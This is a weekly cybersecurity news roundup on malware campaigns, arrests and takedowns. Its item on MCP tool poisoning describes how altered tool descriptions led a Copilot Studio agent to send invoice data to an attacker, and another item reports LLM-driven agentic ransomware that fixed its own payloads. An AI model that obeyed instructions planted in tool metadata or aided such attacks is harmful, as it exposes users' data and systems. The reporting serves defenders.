Weekly Cybersecurity Roundup Explores How Trust Became Cybercriminals’ Biggest Weapon
Defenders intensified disruption efforts through browser extension removals, cybercrime arrests, and infrastructure takedowns targeting networks built on hijacked home devices.
Impersonation remained a dominant tactic as fake Perplexity AI browser extensions and counterfeit verification pages lured users into malware infections.
Microsoft Removes 119 Malicious Edge Extensions Hiding Malware in Images and Fonts
Microsoft removed 119 malicious Edge browser extensions linked to the StegoAd campaign after finding they concealed payloads inside image and font files. The extensions used steganography, polymorphism, delayed activation, and remote code execution backdoors to evade review and detection. The campaign had two main goals: stealing credentials from Google, WordPress, and CMS login pages, and generating revenue through ad injection, search affiliate hijacking, and shopping commission fraud.
Fake Perplexity AI Browser Extension Hijacks Searches Through Typosquatted Domain
A malicious Chromium extension masquerading as Perplexity AI intercepted browser searches by impersonating the popular AI service through a typosquatted domain, perplexity-ai[.]online. Microsoft Threat Intelligence found that the extension exploited Manifest Version 3 (MV3) and the declarativeNetRequest (DNR) API to capture Omnibox queries and search suggestions before quietly forwarding users to legitimate search results, making the activity difficult to notice. Its server-side code logged incoming requests, including search terms and HTTP headers, while a fake onboarding page was used to make the extension appear authentic and reduce suspicion. Google removed the extension after Microsoft disclosed the findings.
Fake Google and Cloudflare Verification Pages Push StealC, and Other Malware
Active ClickFix campaigns are using fake Google and Cloudflare verification pages to trick Windows users into copying and running malicious PowerShell commands. Malwarebytes identified several payloads tied to the activity, including HijackLoader, StealC, Remus, Amatera Stealer, CastleLoader, NetSupport, a Rust-based stealer, and a newly documented loader called ResiLoader. In one infection chain, ResiLoader was delivered through a trojanized version of the Franz messaging app and used to disable security tools before deploying StealC. The lures imitate familiar verification or troubleshooting prompts, including CAPTCHA checks, Google Meet audio fixes, and Google sign-in authorization, while the delivery paths keep shifting across compromised websites, Cloudflare Pages, fake QR code generators, and direct IP-based payload hosting.
Agentic Ransomware Used LLM-Generated Code To Destroy 1,342 Nacos Configurations
Sysdig researchers assessed JADEPUFFER as the first documented case of agentic ransomware, with an LLM-driven operation chaining Langflow exploitation, credential harvesting, and database destruction. The attacker abused CVE-2025-3248. The payloads were self-narrating, corrected failed steps in seconds, and used natural-language reasoning to prioritize targets. In one case, the operation moved from a failed login to a working corrective payload in 31 seconds. The ransomware encrypted all 1,342 Nacos configuration items and used an ephemeral AES key that was printed once but not stored or transmitted, making recovery impossible even if payment was made.
MCP Tool Poisoning Lets Attackers Redirect AI Agents to Steal Data
Microsoft has detailed a new attack technique called Model Context Protocol (MCP) tool poisoning, in which attackers manipulate AI tool descriptions to influence AI agents into performing unauthorized actions, including data exfiltration. The technique targets AI agents capable of taking actions rather than simply answering questions, with Microsoft demonstrating how a Copilot Studio agent handling vendor invoices could be tricked into sending sensitive information to an attacker-controlled endpoint after a routine user request. Instead of compromising the AI model itself, the attack alters tool metadata that agents rely on to determine which actions to perform, making the malicious instructions appear trustworthy.
Suspected Scattered Spider Member Extradited to the U.S. After Finland Arrest
Peter Stokes, 19, a dual citizen of the U.S. and Estonia, was extradited to the United States after his April arrest in Finland and now faces federal conspiracy, computer intrusion, and fraud charges in the Northern District of Illinois. The Justice Department said the criminal complaint links him to Scattered Spider, also tracked as Octo Tempest, UNC3944, and 0ktapus, a group accused of using fraudulent access tactics to breach employee accounts, steal or encrypt data, and extort victims. U.S. officials said Scattered Spider has been tied to more than 100 network intrusions, over $100 million in ransom payments, and millions more in damages.
ARToken Expands Phishing Into a Full Business Email Compromise Platform
Cisco Talos uncovered ARToken, a platform that extends beyond phishing kits into a full business email compromise (BEC) with capabilities such as inbox rule manipulation. Linked to EvilTokens phishing-as-a-service, ARToken employs a seven-layer anti-analysis system to hinder detection. Researchers found it uses highly targeted phishing lures by impersonating real vendor relationships, including invoice requests sent between legitimate business contacts rather than fabricated senders. The platform has incorporated AI into phishing, while EvilTokens activity reportedly surged 1,380% early this year compared to the same period last year.
AdaptHealth Confirms Material Breach After Contractor Session Is Hijacked
AdaptHealth disclosed a material cybersecurity incident after a successful social engineering attack compromised a third-party contractor's user session, allowing a threat actor to access cloud-based business applications. The attacker exfiltrated data, including a stored insurance billing password file, and accessed external electronic health record (EHR) portals. The affected information includes patient personally identifiable information (PII) and protected health information (PHI), although the company said Social Security numbers, payment card data, and financial account information were not stored in the impacted systems.
NetNut Proxy Network Tied to Popa Botnet Disrupted over Hijacked Home Devices
Google Threat Intelligence Group observed 316 threat clusters using suspected NetNut exit nodes in one week in June 2026 to hide unauthorized access attempts against victim environments. The network is estimated to include at least 2 million hijacked home devices worldwide, including smart TVs and streaming boxes enrolled through SDKs. Google disabled accounts and services used for command-and-control, shared technical intelligence with law enforcement and industry partners, and updated Google Play Protect to warn users about apps containing NetNut SDKs. The risk extends beyond NetNut because several residential proxy brands may be white-labeling the same network, meaning parts of the ecosystem may continue operating through resellers or competing providers.
Project Medusa Targets Encrypted Networks Behind Drug-Facilitated Sexual Abuse
Europol launched Project Medusa to dismantle encrypted online communities that enable drug-facilitated sexual assault (DFSA). Perpetrators use closed forums and messaging platforms to exchange abuse techniques, trade prescription drugs and narcotics. They shared exploitative images and videos and reinforced misogynistic narratives. The project is led by Germany and the United Kingdom and includes cross-border victim identification, intelligence sharing, dark web analysis, and IP mapping, and a dedicated database to help identify and remove abusive content. Authorities also plan to use image analysis tools to support victim identification and strengthen investigations across jurisdictions.
The Expanding Abuse of Trust
Whether exploiting familiar software, trusted identities, or personal relationships, attackers seek the paths people least expect. Beyond cybercrime, Europol's Project Medusa highlighted another battle against the abuse of trust, targeting criminal networks that enable drug-facilitated sexual abuse by partners, relatives, friends, and other close acquaintances.







